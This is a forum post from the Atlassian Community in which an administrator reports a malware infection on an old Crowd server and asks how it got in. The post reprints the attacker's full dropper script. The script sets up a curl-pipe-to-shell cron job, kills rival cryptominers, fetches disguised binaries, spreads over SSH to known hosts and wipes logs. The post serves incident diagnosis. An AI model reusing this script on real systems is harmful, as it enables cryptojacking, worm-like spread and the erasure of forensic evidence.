Create
cancel
Showing results for 
Search instead for 
Did you mean: 
Sign up Log in
Celebration

Earn badges and make progress

You're on your way to the next level! Join the Kudos program to earn points and save your progress.

Deleted user Avatar
Deleted user

Level 1: Seed

25 / 150 points

Next: Root

Avatar

1 badge earned

Collect

Participate in fun challenges

Challenges come and go, but your rewards stay with you. Do more to earn more!

Challenges
Coins

Gift kudos to your peers

What goes around comes around! Share the love by gifting kudos to your peers.

Recognition
Ribbon

Rise up in the ranks

Keep earning points to reach the top of the leaderboard. It resets every quarter so you always have a chance!

Leaderboard

Come for the products,
stay for the community

The Atlassian Community can help you and your team get more value out of Atlassian products and practices.

Atlassian Community about banner
4,467,586
Community Members
 
Community Events
177
Community Groups

Crowd susceptible to khugepaged malware as well?

I have been having trouble with my crowd install as of late. The system seems to run out of memory which then kills the crowd java process disallowing anybody to log in. 

I logged into the crowd box this morning and see what seems to be similar behavior that I previously dealt with on an exploited confluence server. 

[root@server-09 crowd]# crontab -l
*/15 * * * * (curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh

and 

khugepaged running in /tmp as a non-root user. 

There are also a couple of other anomolous processes running in /tmp as well. 

[root@server-09 crowd]# ll /tmp/
total 8652
-rwxrwxr-x 1 albie albie 2476028 Jul 31 13:38 77a3984c38bb251
-rwxrwxr-x 1 albie albie 2476028 Jul 30 17:28 77a3984c38bb25153
drwxr-xr-x 2 root root 4096 Jul 30 17:29 hsperfdata_root
-rwxr-xr-x 1 albie albie 572376 Jul 30 17:28 khugepaged
-rwxrwxr-x 1 albie albie 2729824 Jul 19 14:27 sshd
-rwxr-xr-x 1 albie albie 572376 Jul 31 13:38 systemd-uduvd 

specifically the 77a3984... processes. Running strace on these leads to

 

goroutine 1 [running]:
github.com/hippies/LSD/LSDB.KWR(0x6cd9f8, 0xa, 0x7)
/root/go/src/github.com/hippies/LSD/LSDB/a.go:67 +0x3cc
main.main()
/root/go/src/github.com/hippies/LSD/main.go:31 +0x3b1
<unfinished ...>
+++ exited with 2 +++ 

a search of which turns up a result from https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang which seems to say that this is a new variant of the older khugepageds written in golang. 

 

This is a wholly separate machine from the on that I had the confluence malware issues with (although this *is* the authentication point for the confluence install). 

 

The aforementioned cron job downloads an index.html with the following contents:

 

[root@server-09 kerbware]# cat index.html
export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin
mkdir -p /tmp
chmod 1777 /tmp

echo "*/10 * * * * (curl -fsSL -m180 lsd.systemten.org||wget -q -T180 -O- lsd.systemten.org)|sh"|crontab -
cat > /etc/crontab <<EOF
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin

*/10 * * * * root (/usr/local/sbin/77a3984c38bb25153655adf977a1b2||curl -fsSL -m180 lsd.systemten.org||wget -q -T180 -O- lsd.systemten.org)|sh
EOF

ps -ef |grep "\w\{33\}$"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep hwlh3wlh44lh|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep Circle_MI|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep get.bi-chi.com|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep hashvault.pro|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep nanopool.org|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep /usr/bin/bsd-port|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "xmr"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "xig"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "ddgs"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "qW3xT"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "wnTKYg"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "t00ls.ru"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "sustes"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "thisxxs"|awk '{print $2}' | xargs kill -9
ps -ef|grep -v grep|grep "hashfish"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "kworkerds"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "watchbog"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "/tmp/devtool"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "systemctI"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "sustse"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep -E "[a-z]bcb$"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep -E "[a-z]bcc$"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep -E "[a-z]bcd$"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep -E "[a-z]bce$"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep -E "[a-z]fa0$"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep -E "[a-z]fa1$"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep -E "[a-z]fa2$"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep -E "[a-z]fa3$"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep -E "[a-z]fa4$"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "6Tx3Wq"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "dblaunchs"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "migrations"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "httpdz"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "/boot/vmlinuz"|awk '{print $2}'|xargs kill -9
ps -e|grep -v grep|grep "kerberods"|awk '{print $1}'|xargs kill -9
ps -ef|grep -v grep|grep conflue|grep "/bin/bash$"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep conflue|grep "sh rc9$"|awk '{print $2}'|xargs kill -9

cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable
export PATH=$PATH:$(pwd)
if [ ! -f "/tmp/.XImunix" ] || [ ! -f "/proc/$(cat /tmp/.XImunix)/io" ]; then
chattr -i 77a3984c38bb25153655adf977a1b2
rm -rf 77a3984c38bb25153655adf977a1b2
ARCH=$(getconf LONG_BIT)
if [ ${ARCH}x = "64x" ]; then
(curl -fsSL -m180 img.sobot.com/chatres/89/msg/20190729/2328370e8172416fa255e541d82cb271.png -o 77a3984c38bb25153655adf977a1b2||wget -T180 -q img.sobot.com/chatres/89/msg/20190729/2328370e8172416fa255e541d82cb271.png -O 77a3984c38bb25153655adf977a1b2||curl -fsSL -m180 never.b-cdn.net/x64 -o 77a3984c38bb25153655adf977a1b2||wget -T180 -q never.b-cdn.net/x64 -O 77a3984c38bb25153655adf977a1b2||curl -fsSL -m180 cdn.xiaoduoai.com/cvd/dist/fileUpload/1564407863330/7.9092922123650595.jpg -o 77a3984c38bb25153655adf977a1b2||wget -T180 -q cdn.xiaoduoai.com/cvd/dist/fileUpload/1564407863330/7.9092922123650595.jpg -O 77a3984c38bb25153655adf977a1b2)
else
(curl -fsSL -m180 img.sobot.com/chatres/89/msg/20190729/874455422eb04a8fba265f0fc1e07b83.png -o 77a3984c38bb25153655adf977a1b2||wget -T180 -q img.sobot.com/chatres/89/msg/20190729/874455422eb04a8fba265f0fc1e07b83.png -O 77a3984c38bb25153655adf977a1b2||curl -fsSL -m180 never.b-cdn.net/x32 -o 77a3984c38bb25153655adf977a1b2||wget -T180 -q never.b-cdn.net/x32 -O 77a3984c38bb25153655adf977a1b2||curl -fsSL -m180 cdn.xiaoduoai.com/cvd/dist/fileUpload/1564407896384/9.811805826684886.jpg -o 77a3984c38bb25153655adf977a1b2||wget -T180 -q cdn.xiaoduoai.com/cvd/dist/fileUpload/1564407896384/9.811805826684886.jpg -O 77a3984c38bb25153655adf977a1b2)
fi
fi
chmod +x 77a3984c38bb25153655adf977a1b2
$(pwd)/77a3984c38bb25153655adf977a1b2 || ./77a3984c38bb25153655adf977a1b2 || /usr/bin/77a3984c38bb25153655adf977a1b2 || /usr/libexec/77a3984c38bb25153655adf977a1b2 || /usr/local/bin/77a3984c38bb25153655adf977a1b2 || 77a3984c38bb25153655adf977a1b2 || /tmp/77a3984c38bb25153655adf977a1b2 || /usr/local/sbin/77a3984c38bb25153655adf977a1b2
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh >/dev/null 2>&1 &' & done
fi

for file in /home/*
do
if test -d $file; then
if [ -f $file/.ssh/known_hosts ] && [ -f $file/.ssh/id_rsa.pub ]; then
for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" $file/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh >/dev/null 2>&1 &' & done
fi
fi
done

echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cron
#

 

Is there a new exploit running around that somehow hit crowd? This *is* an older version of crowd: 2.7.1 but I can't figure out how this might have gotten in. 

 

Any tips/advice appreciated. 

1 answer

1 accepted

@kuromiyais anyone interested in how my crowd installation got infected with malware?

 

edit: question re-posed here: https://community.atlassian.com/t5/Crowd-questions/Crowd-infected-with-malware

Suggest an answer

Log in or Sign up to answer
TAGS

Atlassian Community Events